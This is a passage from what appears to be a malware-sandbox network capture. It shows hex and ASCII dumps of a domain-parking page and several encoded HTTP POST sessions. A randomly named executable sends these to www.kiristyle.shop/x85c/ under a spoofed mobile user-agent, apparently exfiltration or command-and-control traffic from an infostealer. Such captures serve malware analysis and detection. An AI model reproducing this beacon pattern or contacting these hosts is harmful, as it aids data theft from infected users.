                                                                                  Aug 27, 2024 17:47:49.912590981 CEST1289INData Raw: 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f
                                                                                  Data Ascii: type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></stro
                                                                                  Aug 27, 2024 17:47:49.912606001 CEST1289INData Raw: 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69
                                                                                  Data Ascii: pper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.indeks.space</h1><p class="b-parking__header-description b-text">
                                                                                  Aug 27, 2024 17:47:49.912739992 CEST1289INData Raw: 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f
                                                                                  Data Ascii: g__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__pric
                                                                                  Aug 27, 2024 17:47:49.912754059 CEST1289INData Raw: d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf
                                                                                  Data Ascii: &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nbsp;
                                                                                  Aug 27, 2024 17:47:49.912844896 CEST1289INData Raw: 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 2c 20 31 29 22 20 73
                                                                                  Data Ascii: king-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; }
                                                                                  Aug 27, 2024 17:47:49.913024902 CEST1289INData Raw: 6f 64 79 20 3f 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 3a 20 27 69 6e 6e 65 72 54 65 78 74 27 3b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2e 6d 61 74 63 68 28
                                                                                  Data Ascii: ody ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUnicode = punycode.ToUnicode( domainName ); document.ti
                                                                                  Aug 27, 2024 17:47:49.913038969 CEST1289INData Raw: 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63
                                                                                  Data Ascii: ></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title
                                                                                  Aug 27, 2024 17:47:49.913049936 CEST408INData Raw: 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0a 20 20 20 20 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 22 73 63 72 69 70 74 22 2c 20 22 68 74 74 70 73 3a 2f 2f 6d 63 2e 79 61 6e 64 65 78 2e 72 75 2f 6d 65 74 72 69 6b 61 2f 74 61
                                                                                  Data Ascii: ertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.11.204982435.244.245.121805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:55.811145067 CEST794OUTPOST /x85c/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Origin: http://www.kiristyle.shop
                                                                                  Referer: http://www.kiristyle.shop/x85c/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 45 48 78 72 36 56 39 43 72 67 78 2b 56 34 53 65 78 41 37 79 62 2f 39 6f 6e 38 79 6d 55 77 69 48 56 70 51 33 34 66 38 6b 57 4b 7a 65 31 58 67 47 64 6c 37 6b 58 7a 39 30 6a 69 4d 50 63 42 75 4f 4a 66 4c 68 75 41 36 48 7a 5a 30 69 4d 44 76 4b 50 55 72 35 68 39 78 4d 4f 38 46 6a 70 4a 70 38 77 71 74 46 72 54 4a 6e 49 57 33 69 4c 4e 79 4b 59 43 53 47 55 2b 64 4f 34 4a 4d 4a 2f 63 71 34 63 33 45 65 56 63 52 56 35 2b 53 69 49 79 66 66 54 36 6f 78 4d 49 32 38 46 38 43 6c 30 35 47 4a 66 4b 75 39 31 71 59 45 38 2f 2b 39 45 6b 64 55 54 72 7a 74 67 3d 3d
                                                                                  Data Ascii: AvLLLbOh=V1Oow1vp6cnMKEHxr6V9Crgx+V4SexA7yb/9on8ymUwiHVpQ34f8kWKze1XgGdl7kXz90jiMPcBuOJfLhuA6HzZ0iMDvKPUr5h9xMO8FjpJp8wqtFrTJnIW3iLNyKYCSGU+dO4JMJ/cq4c3EeVcRV5+SiIyffT6oxMI28F8Cl05GJfKu91qYE8/+9EkdUTrztg==
                                                                                  Aug 27, 2024 17:47:55.970052004 CEST357INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.11.204982535.244.245.121805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:58.440512896 CEST1134OUTPOST /x85c/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Origin: http://www.kiristyle.shop
                                                                                  Referer: http://www.kiristyle.shop/x85c/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 6b 69 48 78 74 51 30 36 33 38 6a 57 4b 7a 56 56 57 6f 4c 39 6c 77 6b 58 76 44 30 6d 43 4d 50 63 56 75 50 34 2f 4c 71 2b 41 35 49 6a 5a 7a 6a 4d 44 75 4f 50 55 74 35 68 78 58 4d 50 6f 46 6a 64 35 70 39 79 43 74 54 75 2f 57 77 59 57 78 6b 4c 4e 78 44 34 43 55 47 55 6a 71 4f 38 49 33 4a 4a 55 71 2f 38 58 45 66 56 63 65 66 4a 2f 61 67 49 7a 78 51 52 54 58 34 50 49 56 36 69 6b 33 74 68 42 54 50 76 69 33 2f 6b 61 6b 51 4d 6a 47 6b 6e 56 70 43 77 47 6f 2f 56 77 4d 6c 6e 75 6a 44 4b 76 4a 55 46 4b 4f 48 75 61 41 5a 72 68 67 79 53 47 75 52 45 66 4c 57 6d 76 6a 65 69 70 58 31 59 51 30 69 4f 6a 76 36 5a 54 6f 35 38 2f 37 50 57 74 73 61 70 65 69 4e 49 79 62 55 41 78 4d 65 47 46 54 2f 4b 64 51 39 47 77 79 53 77 4e 56 51 74 48 70 75 67 4e 4b 74 79 64 46 70 67 34 54 41 63 38 32 4b 66 76 4e 57 52 55 32 6c 56 43 4c 77 75 4f 6f 4d 6a 75 6a 68 76 50 35 65 54 64 63 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimGkiHxtQ0638jWKzVVWoL9lwkXvD0mCMPcVuP4/Lq+A5IjZzjMDuOPUt5hxXMPoFjd5p9yCtTu/WwYWxkLNxD4CUGUjqO8I3JJUq/8XEfVcefJ/agIzxQRTX4PIV6ik3thBTPvi3/kakQMjGknVpCwGo/VwMlnujDKvJUFKOHuaAZrhgySGuREfLWmvjeipX1YQ0iOjv6ZTo58/7PWtsapeiNIybUAxMeGFT/KdQ9GwySwNVQtHpugNKtydFpg4TAc82KfvNWRU2lVCLwuOoMjujhvP5eTdcNeeso3nwQg3fHqZPQ2eOdlYsla0HDweG7Nd8F1Y4fZpUxkjgPSgGAAgf6W8DXL19e8UQaHbkaWPsgo7vrBM4xZ1WQykKG2Tzdpm3c4+k8ZBm86dtvooBWF4BouD0zCrqu0F7gYn5dtPVatS3Ca8yaPlbj/vmqZjm1NgHlSBbZLqMWKfrF2yO9R9M/niXs+0urXzddjI7J88Tu9c=
                                                                                  Aug 27, 2024 17:47:58.613126993 CEST357INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.11.204982635.244.245.121805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:01.081391096 CEST5156OUTPOST /x85c/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.kiristyle.shop
                                                                                  Origin: http://www.kiristyle.shop
                                                                                  Referer: http://www.kiristyle.shop/x85c/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 38 69 48 6b 35 51 7a 72 33 38 69 57 4b 7a 4a 6c 57 70 4c 39 6c 58 6b 58 6e 35 30 6d 48 35 50 66 74 75 4f 70 76 4c 71 4d 34 35 44 7a 5a 79 76 73 44 6f 4b 50 56 32 35 68 39 35 4d 4d 55 56 6a 74 6c 70 38 78 32 74 43 4e 6e 4a 79 49 57 33 6b 4c 4e 74 4f 59 44 70 47 55 33 36 4f 38 30 33 4a 4c 67 71 35 4f 76 45 5a 45 63 65 57 35 2f 5a 6d 34 7a 79 5a 78 53 74 34 50 63 42 36 69 6b 34 74 6c 35 54 50 73 47 33 38 6e 69 6e 52 73 6a 47 36 33 56 71 51 41 4b 73 2f 55 59 55 6c 6d 71 6a 44 4e 54 4a 56 6c 4b 4f 52 63 79 44 64 4c 68 6d 32 53 48 34 41 55 6a 44 57 69 48 64 65 6e 35 58 32 6f 55 30 74 5a 50 76 38 34 54 6f 77 38 2f 75 44 47 73 32 52 4a 65 2b 4e 4d 57 68 55 41 52 36 65 45 4a 54 75 61 39 51 33 43 6b 74 47 67 4d 51 4a 74 48 34 6b 41 42 47 74 7a 73 61 70 67 35 4f 41 5a 63 32 4a 76 2f 4e 58 55 67 31 6e 46 43 41 39 4f 50 77 43 7a 69 54 68 73 71 32 65 53 6c 71 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimG8iHk5Qzr38iWKzJlWpL9lXkXn50mH5PftuOpvLqM45DzZyvsDoKPV25h95MMUVjtlp8x2tCNnJyIW3kLNtOYDpGU36O803JLgq5OvEZEceW5/Zm4zyZxSt4PcB6ik4tl5TPsG38ninRsjG63VqQAKs/UYUlmqjDNTJVlKORcyDdLhm2SH4AUjDWiHden5X2oU0tZPv84Tow8/uDGs2RJe+NMWhUAR6eEJTua9Q3CktGgMQJtH4kABGtzsapg5OAZc2Jv/NXUg1nFCA9OPwCziThsq2eSlqNfaspXnwVHrYNaZUdWeQeVZzlaJuDxa468B8EFo4IZpT1EjkBygMKggf6WByXLx9dIYQbwXkRnPsio7trBMTxZp1QycgGyvNdv23dpOkvtVh4Kdorooacl0Woqq7zC7UuD17hY35XNPWRdS8Fa9xQvpfj/zYqYX21KcHlUw5C4GVHZrXZFGF2hRE4EWI8YwehAr0TQsVSNs7w6zaUxlFwZhvqwGmL0qZRFZ9Hcth4OzKFvKtW16UA3X6Xrd1DnjkGj1uSf0ctbFnkMVMQZ8Pop8VzekJvrlS9oYHj57NcBB4p8y4sRIvD81FvIQ7N7fvHn0iS8NDKqJHCMWB6j/ht7jhLVVWUN/zENP3MF1h8Fa4JYloDKUUOrjtuExj0x8n8dgawwlhOD3E+drgh6yeItSLwQ1nWptjS0IJ3p0iQJ3/NWkp212G5wYzQmNM6se0hpCq+9RTseYrJBosj8NV7q32X+/x/XrK32bFK5NxewFAETdTqN3XhhLnvwJH3DD+zvaXAXiRkLNGwWpLRwYEkEx70599NA+4Thgqyj3+Vu66K0g4Wo1gXeCyr2BH0mms0HOSF8pLoWgMwY7JSV7qRxPLDBrlJp8DgFvvcX3yhERLnru2ZPN3vgDIYv63sKmyQVmDCFuDsUrJX2qKDPQE9QeQKsFDHdXVTeD [TRUNCATED]
                                                                                  Aug 27, 2024 17:48:01.081413984 CEST6445OUTData Raw: 51 70 63 61 46 36 52 36 63 42 61 52 63 39 52 44 53 74 63 6b 2f 63 54 35 32 62 74 74 32 79 63 6a 47 7a 4f 78 58 34 62 30 41 44 45 4f 75 75 4e 39 45 57 66 65 6d 38 77 70 54 52 4f 57 57 62 30 75 78 74 4c 56 4a 76 4e 2f 59 73 62 48 38 36 65 4d 62 46
                                                                                  Data Ascii: QpcaF6R6cBaRc9RDStck/cT52btt2ycjGzOxX4b0ADEOuuN9EWfem8wpTROWWb0uxtLVJvN/YsbH86eMbFvQvC+K4Qg2p6yZ19nAtR8iyR0QwsIAb3gaxStho0cxuGr3KScR1zuyTrhxfuaYlRsLHSfgh1gQu86D5lwkxsZ9aOsz5FhX7fWPQka5GwkLoY/cvjTEJzGTILqMQYbyWAQTmh6uGnz43tqodIIAnsrPx4EF+Vd/udR
                                                                                  Aug 27, 2024 17:48:01.081459999 CEST1289OUTData Raw: 32 6a 2f 58 48 6b 45 57 62 66 57 64 32 6a 6c 61 6c 2f 7a 69 6c 73 33 48 53 38 78 51 66 6c 76 38 6a 50 6a 5a 68 2b 32 33 33 2b 2f 31 54 53 64 75 62 75 4d 2f 7a 6a 39 65 68 4b 31 6a 65 4f 65 37 6c 47 43 48 34 4b 50 2b 6e 45 57 72 66 41 44 2f 46 47
                                                                                  Data Ascii: 2j/XHkEWbfWd2jlal/zils3HS8xQflv8jPjZh+233+/1TSdubuM/zj9ehK1jeOe7lGCH4KP+nEWrfAD/FG6YEu9xuTjCF8HYq3sscxbMufR0Obc0A2gspN0SjRiHKhMZN2qwYfW4geNuqqYPfenMwY1DEazwnHQIcqNLlpT4IqNK8e992Y1V2yCHEUNUdJE3bZKq0wKQ6W1i9bWICrF7YhINi24/l9YZa2G9sQulcNPPxzrnGVm
                                                                                  Aug 27, 2024 17:48:01.183325052 CEST2578OUTData Raw: 5a 69 35 50 4b 76 70 62 6c 44 64 2b 62 66 71 6b 42 46 71 6d 4e 38 4b 38 2f 70 72 36 68 5a 48 70 58 4e 37 41 37 70 57 4d 61 77 39 69 66 48 48 44 34 56 7a 69 53 6a 6e 4f 71 61 39 69 34 65 74 57 56 63 48 6e 48 44 34 4c 59 75 5a 30 71 31 74 69 38 63
                                                                                  Data Ascii: Zi5PKvpblDd+bfqkBFqmN8K8/pr6hZHpXN7A7pWMaw9ifHHD4VziSjnOqa9i4etWVcHnHD4LYuZ0q1ti8cUvPq2GQrPaYO9pVxhncr8AhZS5RFuA8Ourn4XsC+BPST/egm04toyiwFnTeb+hwmPitOR4KcW4Q7xJxPYfelN0mwCZoIao/U3nMnuvMrWIPvRGcTRulGNw9UdJaqQRTmN3ycSyqTEuana9Sw9QoT8nNT7QKEHvSBc
                                                                                  Aug 27, 2024 17:48:01.183394909 CEST10312OUTData Raw: 2f 37 37 58 4a 4a 78 7a 56 53 55 38 46 47 4b 6d 4b 55 45 2b 30 30 5a 79 4d 49 65 58 78 4a 41 71 75 70 43 71 54 77 4d 34 61 36 58 74 56 77 4c 33 51 4a 52 47 35 4d 30 52 64 54 56 4e 63 59 4b 4d 68 44 30 70 55 6f 4e 30 6c 75 72 6e 30 74 33 50 59 52
                                                                                  Data Ascii: /77XJJxzVSU8FGKmKUE+00ZyMIeXxJAqupCqTwM4a6XtVwL3QJRG5M0RdTVNcYKMhD0pUoN0lurn0t3PYRfQ+u9jmWCyd3sRQueI3KJbwgQ037Cc820HLY+riwsYyGzsLLl9r7716hfhjMELMT7Fe9fAG89hlPLhnpDlhzYvXmksoVVwuaakQr86Xhhc7vdnFNHdRLeqBHi4Ebm22V+paI4fJf6BtUNvjgLT71ZSxNs1UPF3De1
                                                                                  Aug 27, 2024 17:48:01.183413029 CEST2578OUTData Raw: 52 35 41 5a 66 78 71 73 49 77 57 39 32 4a 43 6f 57 47 61 42 58 39 41 57 6c 64 6c 35 47 76 68 41 6a 66 30 63 43 39 76 46 41 41 55 67 70 4e 35 61 61 6d 4b 53 7a 53 54 6d 52 43 6e 6d 4e 67 52 35 37 69 32 6d 32 31 4a 42 44 37 45 35 6d 48 47 2b 2f 52
                                                                                  Data Ascii: R5AZfxqsIwW92JCoWGaBX9AWldl5GvhAjf0cC9vFAAUgpN5aamKSzSTmRCnmNgR57i2m21JBD7E5mHG+/RpUciDPpZSjKZSCzBQUrZ/l4sGEccyKKkmO3L2Ss0t/cPWHzlIBsXCA3qG4UO4Akc2ErlUj596n4bhDp5lEuTdzh+BTIQ5hHeY6T6DKYT7UpkqkNAVxkGDNfSWNRAl0DG5gXcuR/x2ta15QXA8td3EFDShjpNxC+wB
                                                                                  Aug 27, 2024 17:48:01.183602095 CEST2578OUTData Raw: 68 55 56 49 72 38 75 70 69 2f 4b 30 57 6b 43 63 73 6e 55 50 68 48 63 5a 39 39 39 74 70 50 63 67 44 4c 30 58 38 72 54 41 41 34 42 6b 2b 69 38 32 59 61 68 37 6c 63 49 68 53 5a 4f 55 70 37 49 48 49 57 49 30 57 6c 41 66 59 71 2f 39 55 79 63 58 75 64
                                                                                  Data Ascii: hUVIr8upi/K0WkCcsnUPhHcZ999tpPcgDL0X8rTAA4Bk+i82Yah7lcIhSZOUp7IHIWI0WlAfYq/9UycXud7CYtJxmxbiNa9g4gws3AMtugvuVid85uJdBmnkqgweKhwMDvnt9PlILLc5FcKjB9t6seyQiEKkxMQ6DLpoh0Fs4z0om+tMyBiDONXA5VCY1AS03Na5/gDf6hf7KnxxZK1tVtne2ZuKHXiKlck/JgmOd7v6fQhKxUF
                                                                                  Aug 27, 2024 17:48:01.183917999 CEST1289OUTData Raw: 58 74 56 57 4c 49 45 71 72 35 4c 4f 7a 64 42 58 51 43 7a 78 63 38 58 6a 5a 39 67 4e 58 45 50 65 54 36 58 2f 6d 59 56 6c 56 41 6d 31 4a 52 79 4d 50 34 75 37 68 32 65 63 36 5a 42 65 45 50 31 43 52 51 52 62 57 55 74 74 68 57 70 65 37 45 64 5a 72 69
                                                                                  Data Ascii: XtVWLIEqr5LOzdBXQCzxc8XjZ9gNXEPeT6X/mYVlVAm1JRyMP4u7h2ec6ZBeEP1CRQRbWUtthWpe7EdZriedGcavkm/0RkjkKOshvX0cpPgyi7iUD8WKeYBJYMZd1PiI8CBRAHNQs6MSkc6RD6nkicYTI7bpucc0TItWsGOmQp8LuGtnSnqTDBeoYTT8pWPdVA5WVNLvnuSqLpE9NAjMlyjx7Q46IplvpdHk2uWvicFKfQqAvNq
                                                                                  Aug 27, 2024 17:48:01.184115887 CEST6445OUTData Raw: 57 50 42 56 36 44 42 35 37 31 77 72 58 48 39 2f 4b 64 79 36 52 38 30 4d 64 50 68 6c 4a 49 54 37 6a 4e 44 4a 35 72 59 70 59 54 37 69 47 54 6f 4c 5a 37 4c 59 49 36 49 58 54 7a 45 45 54 56 71 57 57 71 78 4b 7a 5a 79 6f 66 78 4c 41 77 4b 35 38 48 4f
                                                                                  Data Ascii: WPBV6DB571wrXH9/Kdy6R80MdPhlJIT7jNDJ5rYpYT7iGToLZ7LYI6IXTzEETVqWWqxKzZyofxLAwK58HO+ircsp/jDB+Bg7h0K8UZos8CmpYPG5irN2/FZDGLgMRMjDEFlZS9E1ZUISX06zNM53Yrt5jCm6u5J5mUMGWOSskVdWfzH7jcP2vVzgpYmS9gOKqIMyqEcbcuGF9VV6B0LuPynAmV8ZoSjJ7N3C999EbW8XOCpXjgA
                                                                                  Aug 27, 2024 17:48:01.240520954 CEST357INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:48:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.kiristyle.shop/x85c/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                  Aug 27, 2024 17:48:01.285449028 CEST2578OUTData Raw: 50 77 49 6f 45 77 44 7a 54 56 76 74 36 59 50 76 77 2b 31 37 4a 41 6e 33 68 49 4c 6e 49 66 6c 35 2f 54 67 65 6c 53 4a 36 4e 6e 55 71 6e 53 58 6a 71 5a 6e 63 4d 4c 30 73 43 79 6c 44 67 34 30 49 53 33 6e 68 38 42 51 39 44 34 57 79 61 76 7a 55 61 79
                                                                                  Data Ascii: PwIoEwDzTVvt6YPvw+17JAn3hILnIfl5/TgelSJ6NnUqnSXjqZncML0sCylDg40IS3nh8BQ9D4WyavzUayz9+OEa/tU60A4b0huiG/C9sxzJsc92j62WCvFbFy4xcZu7WOKmBidr5J17wz/w8HmQGLFuV85JPQ/yG9Em4+FJM/8UYzwBQrt4m4eb5sftrXLEJv9n1HgXjDXPcYe4/GbBl5Y3ZZY48liAidcNZ3peoL7re71lmwe
                                                                                  Aug 27, 2024 17:48:01.285471916 CEST5156OUTData Raw: 76 61 79 6e 67 64 46 52 70 79 43 6c 48 6c 33 63 32 33 54 70 78 39 5a 4e 4d 68 6b 44 7a 59 79 35 4c 77 69 55 4d 78 51 64 51 68 6f 55 42 77 55 56 6b 5a 59 31 57 47 2b 51 49 66 30 37 50 39 55 61 70 73 34 58 46 38 6a 66 4b 51 4e 63 6d 49 57 63 74 6a
                                                                                  Data Ascii: vayngdFRpyClHl3c23Tpx9ZNMhkDzYy5LwiUMxQdQhoUBwUVkZY1WG+QIf07P9Uaps4XF8jfKQNcmIWctj0RDtN6TIXbFUIAsrbWlrARphiv/1iFVrj+qLIjWE7RniDTP8XEBx2IS00eCXusm6JMCgqzJEqd3AE7yi+5UMSZpCkenAMwbI96DqMzYNYBMqEquB2K3YwskOl/ZW2SMZkDOw08BOIeNjY2ALEAwNFntnqv++DXg5e


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.11.204982735.244.245.121805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
